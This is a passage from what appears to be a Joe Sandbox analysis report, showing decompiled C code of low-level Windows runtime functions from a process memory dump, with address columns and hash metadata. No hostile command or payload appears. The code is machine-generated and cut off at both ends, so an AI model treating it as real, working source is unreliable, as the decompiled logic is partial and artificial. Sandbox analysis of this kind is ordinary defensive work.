								_t74 = _v76;
								_v44 =  &_v72;
								 *0x1978774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(L0188B6F0(0x186c338, 0x186c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E018C9520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E018C95D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					L0189FFB0(_t68, _t77, 0x1978778);
				}
				_pop(_t78);
				return L018CB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                                  0x019069b5
                                                  0x019069be
                                                  0x019069c3
                                                  0x019069c9
                                                  0x019069cc
                                                  0x019069d1
                                                  0x019069d3
                                                  0x019069de
                                                  0x019069e1
                                                  0x019069ea
                                                  0x019069f6
                                                  0x019069fe
                                                  0x01906a13
                                                  0x01906a14
                                                  0x01906a15
                                                  0x01906a16
                                                  0x01906a1e
                                                  0x01906a26
                                                  0x01906a31
                                                  0x01906a36
                                                  0x01906a37
                                                  0x01906a40
                                                  0x01906a49
                                                  0x01906a4a
                                                  0x01906a53
                                                  0x01906a59
                                                  0x01906a5d
                                                  0x01906a5e
                                                  0x01906a64
                                                  0x01906a67
                                                  0x01906a6a
                                                  0x01906a6d
                                                  0x01906a70
                                                  0x01906a77
                                                  0x01906a7d
                                                  0x01906a86
                                                  0x01906a89
                                                  0x01906a9c
                                                  0x01906a9f
                                                  0x01906aa2
                                                  0x01906aa5
                                                  0x01906aaf
                                                  0x01906ab1
                                                  0x01906ab8
                                                  0x01906ab9
                                                  0x01906abb
                                                  0x01906abe
                                                  0x01906ac5
                                                  0x01906ac5
                                                  0x01906aaf
                                                  0x01906a40
                                                  0x01906a26
                                                  0x019069fe
                                                  0x01906ace
                                                  0x01906ad0
                                                  0x01906ad3
                                                  0x01906ad8
                                                  0x01906adf
                                                  0x01906adf
                                                  0x01906ae8
                                                  0x01906aef
                                                  0x01906aef
                                                  0x01906af9
                                                  0x01906b06

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a6660d2706f42ac42c32923c1c3fea8ab94cd05031e51a73ed343ac5e949a75a
                                                  • Instruction ID: 57145ec2ec0917e171dc6f3e34f0f6c0ea4928e61cdb56bd174e002f8eb27288
                                                  • Opcode Fuzzy Hash: a6660d2706f42ac42c32923c1c3fea8ab94cd05031e51a73ed343ac5e949a75a
                                                  • Instruction Fuzzy Hash: 6B418EB1D002099FDB25DFA9C940BFEBBF8EF48714F14812AE918E7240DB709945CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01885210 Relevance: .1, Instructions: 107COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 85%
                                                  			E01885210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E018852A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E018C95D0();
							L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E0189EB70(_t54, 0x19779a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E018C95D0();
								L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E0189EB70(_t54, 0x19779a0);
						}
						return _t52;
					}
					L5:
					_t33 = E018CF3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E0189EB70(_t54, 0x19779a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E018C95D0();
							L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                                  0x01885220
                                                  0x01885224
                                                  0x018e0d13
                                                  0x018e0d16
                                                  0x018e0d19
                                                  0x0188522a
                                                  0x0188522a
                                                  0x0188522d
                                                  0x0188522d
                                                  0x01885231
                                                  0x01885235
                                                  0x01885239
                                                  0x018e0d5c
                                                  0x018e0d62
                                                  0x00000000
                                                  0x00000000
                                                  0x018e0d6a
                                                  0x018e0d7b
                                                  0x018e0d7f
                                                  0x018e0d81
                                                  0x018e0d84
                                                  0x018e0d95
                                                  0x018e0d95
                                                  0x018e0d6c
                                                  0x018e0d71
                                                  0x018e0d71
                                                  0x018e0d9a
                                                  0x00000000
                                                  0x0188524a
                                                  0x0188524a
                                                  0x01885250
                                                  0x018e0d24
                                                  0x018e0d35
                                                  0x018e0d39
                                                  0x018e0d3b
                                                  0x018e0d3e
                                                  0x018e0d50
                                                  0x018e0d50
                                                  0x018e0d26
                                                  0x018e0d2b
                                                  0x018e0d2b
                                                  0x00000000
                                                  0x018e0d55
                                                  0x01885256
                                                  0x0188525b
                                                  0x01885265
                                                  0x018e0da7
                                                  0x0188526b
                                                  0x0188526e
                                                  0x01885272
                                                  0x018e0db1
                                                  0x018e0db4
                                                  0x018e0dc5
                                                  0x018e0dc5
                                                  0x01885272
                                                  0x01885278
                                                  0x0188527e
                                                  0x0188528a
                                                  0x0188528c
                                                  0x0188528d
                                                  0x00000000
                                                  0x01885280
                                                  0x01885282
                                                  0x01885288
                                                  0x0188529f
                                                  0x01885292
                                                  0x00000000
                                                  0x01885292
                                                  0x00000000
                                                  0x01885288
                                                  0x0188527e

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b7d7d4bf6f1e465c1e75b62e74362a76405d76f67b5505ee3a83f7d7aefcce19
                                                  • Instruction ID: 1eb0339951468ce5ff322930cffa148a3959f86b68553eb1bb4522a4b0e46690
                                                  • Opcode Fuzzy Hash: b7d7d4bf6f1e465c1e75b62e74362a76405d76f67b5505ee3a83f7d7aefcce19
                                                  • Instruction Fuzzy Hash: 62311531341605DBC722AB2CC885F6A7BA5AF21720F114B19F455CB590DBB1EF00C791
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018AC182 Relevance: .1, Instructions: 104COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 68%
                                                  			E018AC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(L018A7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E01958D34(_v8, _t80);
					}
					E018A2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						L0189FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E01958833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						L0189FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E018CB180();
						if(_a4 != 0) {
							E018A2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E018ABB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E018ABB2D(_t16, _t15);
						E018AB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						L0189FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							L0189FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					L0189FFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                                  0x018ac18d
                                                  0x018ac18f
                                                  0x018ac191
                                                  0x018ac19b
                                                  0x018ac1a0
                                                  0x018ac1d4
                                                  0x018ac1de
                                                  0x018f2d6e
                                                  0x018ac1e4
                                                  0x018ac1e4
                                                  0x018ac1e4
                                                  0x018ac1ec
                                                  0x018f2d7d
                                                  0x018f2d7d
                                                  0x018ac1f3
                                                  0x018ac1ff
                                                  0x018f2d88
                                                  0x018f2d8d
                                                  0x018f2d94
                                                  0x018f2d94
                                                  0x018f2d9f
                                                  0x018f2da4
                                                  0x018f2dab
                                                  0x018f2db0
                                                  0x018f2db2
                                                  0x018f2db3
                                                  0x018f2db4
                                                  0x018f2dbc
                                                  0x018f2dc3
                                                  0x018f2dc3
                                                  0x018ac205
                                                  0x018ac205
                                                  0x018ac208
                                                  0x018ac20e
                                                  0x018ac211
                                                  0x018ac216
                                                  0x018ac219
                                                  0x018ac21f
                                                  0x018ac222
                                                  0x018ac22c
                                                  0x018ac234
                                                  0x018ac23a
                                                  0x018ac23f
                                                  0x018ac245
                                                  0x018ac24b
                                                  0x018ac251
                                                  0x018ac25a
                                                  0x018ac276
                                                  0x018ac27d
                                                  0x018ac27d
                                                  0x018ac25c
                                                  0x018ac25c
                                                  0x00000000
                                                  0x018ac25e
                                                  0x018ac1a4
                                                  0x018ac1aa
                                                  0x018ac1b3
                                                  0x018ac265
                                                  0x018ac26c
                                                  0x018ac26c
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                  • Instruction ID: 043cae3eca68106bb647fe62de808bc6592f2ff774be6c0f509119f73590a181
                                                  • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                  • Instruction Fuzzy Hash: B3310372B0194BABEB05EBB8C480BE9FB54BF92304F48415AD51CD7201DB38AB15C7E2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01907016 Relevance: .1, Instructions: 104COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 76%
                                                  			E01907016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x197d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E01906B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E01906B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(L018A7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E018C9AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return L018CB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L018A4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                                  0x01907016
                                                  0x0190701e
                                                  0x0190702b
                                                  0x01907033
                                                  0x01907037
                                                  0x0190703c
                                                  0x0190703e
                                                  0x01907041
                                                  0x01907045
                                                  0x0190704a
                                                  0x01907050
                                                  0x01907055
                                                  0x0190705a
                                                  0x01907062
                                                  0x01907062
                                                  0x0190705a
                                                  0x01907064
                                                  0x01907064
                                                  0x01907067
                                                  0x01907071
                                                  0x01907096
                                                  0x0190709b
                                                  0x019070a2
                                                  0x019070a6
                                                  0x019070a7
                                                  0x019070ad
                                                  0x019070b3
                                                  0x019070b6
                                                  0x019070bb
                                                  0x019070c3
                                                  0x019070c3
                                                  0x019070c6
                                                  0x019070cd
                                                  0x019070dd
                                                  0x019070e0
                                                  0x019070e2
                                                  0x019070e2
                                                  0x019070ee
                                                  0x01907101
                                                  0x019070f0
                                                  0x019070f9
                                                  0x019070f9
                                                  0x0190710a
                                                  0x0190710e
                                                  0x01907112
                                                  0x01907117
                                                  0x01907118
                                                  0x01907118
                                                  0x019070bb
                                                  0x0190711d
                                                  0x01907123
                                                  0x01907131
                                                  0x01907131
                                                  0x01907136
                                                  0x0190713d
                                                  0x0190713e
                                                  0x0190713f
                                                  0x0190714a
                                                  0x0190714a
                                                  0x01907084
                                                  0x01907088
                                                  0x00000000
                                                  0x0190708e
                                                  0x0190708e
                                                  0x01907092
                                                  0x00000000
                                                  0x01907092

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6b78e9ade3dc64a1cb51a880a9671d0412a37962707f27e97ee3cde9c4761d19
                                                  • Instruction ID: 83039d8c164a01f91974c2574e1ef7ad02be200e0ef8b28b39e2c9979ede1e2f
                                                  • Opcode Fuzzy Hash: 6b78e9ade3dc64a1cb51a880a9671d0412a37962707f27e97ee3cde9c4761d19
                                                  • Instruction Fuzzy Hash: A531B3726087919FD325DF6CC840A6AB7F9BFC8710F044A29F999876D0E730E914C7A6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018B61A0 Relevance: .1, Instructions: 93COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 97%
                                                  			E018B61A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = L018B5E50(0x18667cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E01959D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						L0188F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                                  0x018b61b3
                                                  0x018b61b5
                                                  0x018b61bd
                                                  0x018b61c3
                                                  0x018b61c7
                                                  0x018b61d2
                                                  0x018b61ff
                                                  0x018b61ff
                                                  0x018b6201
                                                  0x018b6207
                                                  0x018b6207
                                                  0x018b61d4
                                                  0x018b61d9
                                                  0x00000000
                                                  0x00000000
                                                  0x018b61df
                                                  0x018b61e2
                                                  0x00000000
                                                  0x00000000
                                                  0x018b61e6
                                                  0x018b61e8
                                                  0x018b61ee
                                                  0x018b61ee
                                                  0x018b61f9
                                                  0x018f762f
                                                  0x018f7632
                                                  0x018f7635
                                                  0x018f7639
                                                  0x018f7640
                                                  0x018f766e
                                                  0x018f7675
                                                  0x00000000
                                                  0x00000000
                                                  0x018f7681
                                                  0x018f7689
                                                  0x018f768d
                                                  0x018f7691
                                                  0x018f7695
                                                  0x018f7699
                                                  0x018f76af
                                                  0x018f76b5
                                                  0x018f76b7
                                                  0x018f76b7
                                                  0x018f76d7
                                                  0x018f76dc
                                                  0x00000000
                                                  0x018f76dc
                                                  0x018f76a2
                                                  0x018f76a9
                                                  0x018f7651
                                                  0x018f7653
                                                  0x018f7653
                                                  0x018f7656
                                                  0x018f7656
                                                  0x00000000
                                                  0x018f7656
                                                  0x018f7644
                                                  0x018f7646
                                                  0x018f7648
                                                  0x018f7648
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 735b92b63cadd175f8e9d3dde6445efb6e1185dfe1937c386717eaa0858102bc
                                                  • Instruction ID: 54ae27c600a194726b6f2d08d8099160fb54f592e96372dc4d662f7c6440c5c1
                                                  • Opcode Fuzzy Hash: 735b92b63cadd175f8e9d3dde6445efb6e1185dfe1937c386717eaa0858102bc
                                                  • Instruction Fuzzy Hash: 0F318D716057018FE360DF1DC840B66BBE5FB88B04F15496DEA98DB361E7B4EA04CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0188AA16 Relevance: .1, Instructions: 93COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 95%
                                                  			E0188AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x197d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x1977b9c; // 0x0
					_t53 = L018A4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return L018CB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E018CF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L01896C59(_t53, _t51, _t58) != 0) {
							_t28 = L018B5E50(0x186c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E018BB230(_v32, _v28, 0x186c2d8, 1,  &_v24);
								_t28 = L0188F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                                  0x0188aa25
                                                  0x0188aa29
                                                  0x0188aa2d
                                                  0x0188aa30
                                                  0x0188aa37
                                                  0x0188aa3c
                                                  0x018e4458
                                                  0x018e4458
                                                  0x018e4472
                                                  0x018e4474
                                                  0x018e4476
                                                  0x0188aa64
                                                  0x0188aa74
                                                  0x018e447c
                                                  0x018e4483
                                                  0x018e4492
                                                  0x0188aa52
                                                  0x0188aa54
                                                  0x0188aa5e
                                                  0x018e44a8
                                                  0x018e44ad
                                                  0x018e44af
                                                  0x018e44b6
                                                  0x018e44b6
                                                  0x018e44b9
                                                  0x018e44bc
                                                  0x018e44cd
                                                  0x018e44d3
                                                  0x018e44d6
                                                  0x018e44e1
                                                  0x018e44e1
                                                  0x018e44e6
                                                  0x018e44e8
                                                  0x018e44fb
                                                  0x018e44fb
                                                  0x018e44e8
                                                  0x00000000
                                                  0x0188aa5e
                                                  0x018e4476
                                                  0x0188aa42
                                                  0x0188aa46
                                                  0x0188aa48
                                                  0x0188aa4c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b1c26f1d6a63e000ae1f1bd4f55dfca069388d3dd123863e5f6ef03ef02ff13b
                                                  • Instruction ID: 798512e1dcfbd304d1ad9c0234abc7b4142f66d0bb672751b900cf5a1dc41af5
                                                  • Opcode Fuzzy Hash: b1c26f1d6a63e000ae1f1bd4f55dfca069388d3dd123863e5f6ef03ef02ff13b
                                                  • Instruction Fuzzy Hash: 5E31C571A0021AABDF15AF68CD81A7FB7B9EF04700F01406AF905E7240E775AB11DBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018C4A2C Relevance: .1, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 58%
                                                  			E018C4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x197d360 ^ _t62;
				_v8 =  *0x197d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E018A2280(_t26, 0x1978608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						L0189FFB0(_t41, _t51, 0x1978608);
						L2:
						 *0x197b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return L018CB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E018A2280(_t28, 0x1978608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							L0189FFB0(_t42, _t53, 0x1978608);
							if(_t53 != 0) {
								L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						L0189FFB0(_t41, _t51, 0x1978608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                                  0x018c4a2c
                                                  0x018c4a34
                                                  0x018c4a3c
                                                  0x018c4a3e
                                                  0x018c4a48
